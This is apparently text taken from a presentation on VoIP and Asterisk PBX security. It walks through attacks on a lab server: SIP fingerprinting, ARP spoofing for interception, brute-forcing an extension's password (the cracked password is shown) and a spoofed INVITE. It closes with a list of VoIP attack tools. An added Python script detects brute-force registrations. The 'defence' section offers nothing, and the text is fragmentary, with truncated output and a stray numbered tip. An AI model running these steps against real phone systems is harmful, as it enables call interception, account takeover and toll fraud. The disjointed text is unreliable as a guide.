By Ahmad Qubbaj
VOIP introduction:
Voice over Internet Protocol (VoIP) is a methodology and group of technologies for the
delivery of voice communications and multimedia sessions over Internet Protocol (IP)
networks, such as the Internet. Other terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, IP
communications, and broadband phone service.
VoIP is an exciting technology which provides many benefits and cost-effective
solutions for communication. More and more small and enterprise businesses are
replacing their old traditional telephony systems with IP-based ones.
A VoIP-based PBX can provide many features such as: Multiple Extensions, Caller ID,
Voice mail, IVR capabilities, Recording of conversations, Logging, Usage with
hardware-based telephones or software-based ones (aka softphones).
Nowadays there are many vendors of PBXs, IP telephones, VoIP services and equipment,
such as CISCO, AVAYA, ASTERISK, SNOM and THOMSON. With new technology comes
a new challenge for both the defensive and offensive side of security.
Self Hosted
A PBX (e.g. Asterisk) is installed at the client site and connected to an ISP or telephony
service provider PSTN via a SIP Trunk/PRI. The VoIP traffic flows through a dedicated
VLAN.
Hosted Services
There is no need for a PBX on site. Just a switch, a router, IP phones and a connection
to the service provider PBX via Internet or IP/VPN connection. Each phone is
configured with SIP account information.
asterisk
192.168.0.104
Centos
7/01/2013
ATTACK..
root@qubbaj:~# ./smap -O 192.168.0.104
smap 0.6.0 <hs@123.org> http://www.wormulon.net/
192.168.0.104: ICMP reachable, SIP enabled
best guess (77% sure) fingerprint:
Asterisk PBX SVN-trunk-r56579
Server: Asterisk PBX 1.6.2.0
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
root@qubbaj:~#
root@qubbaj:~# sipsak -vv -s sip:192.168.0.104
From: sip:sipsak@127.0.1.1:54669;tag=7244113d
To: sip:192.168.0.104;tag=as383f41be
Call-ID: 1917063485@127.0.1.1
CSeq: 1 OPTIONS
<--
5) Allow only one or two calls at a time per SIP entity, where possible. At the
worst, limiting your exposure to toll fraud is a wise thing to do. This also limits
your exposure when legitimate password holders on your system lose control of
their passphrase, writing it on the bottom of the SIP phone, for instance, which
I've seen.
ATTACK..
root@qubbaj:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@qubbaj:~# arpspoof -i wlan0 -t 192.168.0.104 192.168.0.2
ATTACK..
root@qubbaj:sipvicious# ./svcrack.py -u6020 -d pass.txt 192.168.0.104
| Extension | Password |
------------------------
| 6020      | 6020pass |
root@qubbaj:sipvicious#
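A password-guessing run like the one above shows up on the PBX as a burst of failed REGISTER attempts from a single source. The following is an added example, not part of the original slides: it counts chan_sip "Registration ... failed" NOTICE lines per source address inside a sliding time window. The sample log lines, the attacker address 192.168.0.50, the threshold and the window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the format chan_sip writes to the Asterisk log:
# six quick failures from one host, one isolated failure from another.
SAMPLE_LOG = "\n".join(
    [f"[2013-01-07 10:15:0{i}] NOTICE[2211] chan_sip.c: Registration from "
     "'\"6020\" <sip:6020@192.168.0.104>' failed for '192.168.0.50' - Wrong password"
     for i in range(6)]
    + ["[2013-01-07 10:20:00] NOTICE[2211] chan_sip.c: Registration from "
       "'<sip:6021@192.168.0.104>' failed for '192.168.0.60:5060' - Wrong password",
       "[2013-01-07 10:21:00] VERBOSE[2211] chan_sip.c: Reloading SIP"]
)

# Timestamp, From header, source IP (newer versions append ":port"), reason.
FAILED = re.compile(
    r"^\[(?P<ts>[\d-]+ [\d:]+)\] NOTICE\[\d+\](?:\[[^\]]*\])? chan_sip\.c: "
    r"Registration from '(?P<frm>.*)' failed for "
    r"'(?P<ip>\d+\.\d+\.\d+\.\d+)(?::\d+)?' - (?P<reason>.+)$"
)
EXT = re.compile(r"sips?:([^@>;]+)@")  # user part of the SIP URI

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: extensions tried} for every source that produced
    at least `threshold` failed registrations within one `window`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue  # not a failed-registration line
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        ext = EXT.search(m.group("frm"))
        events[m.group("ip")].append((ts, ext.group(1) if ext else "?"))
    flagged = {}
    for ip, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Shrink the window from the left until it spans <= `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = sorted({e for _, e in hits})
                break
    return flagged

if __name__ == "__main__":
    for ip, exts in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: repeated failed registrations for {', '.join(exts)}")
```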
ATTACK..
SIP request INVITE from header.
INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
DEFENCE..
I have no idea..
fping
Nessus
nmap
snmpwalk
SNSscan
SuperScan
VLANping
Enumeration
netcat
SiVuS
sipsak
SIPSCAN
smap
TFTP Brute Forcer
Angst
Cain and Abel
DTMF Decoder
dsniff
NetStumbler
Oreka
VoIPong
vomit
Network and Application Interception
arpwatch
Cain and Abel
dsniff
ettercap
fragrouter
siprogue
XArp
Cisco Unified CallManager
IAX Flooder
IAX Enumerator
Fuzzing
INVITE Flooder
RTP Flooder
UDP Flooder
UDP Flooder w/VLAN support
Signaling and Media Manipulation
AuthTool
BYE Teardown
Check Sync Phone Rebooter
RedirectPoison
Registration Hijacker
Registration Eraser
Registration Adder
RTP InsertSound v2.0
RTP InsertSound v3.0
RTP MixSound v2.0
RTP MixSound v3.0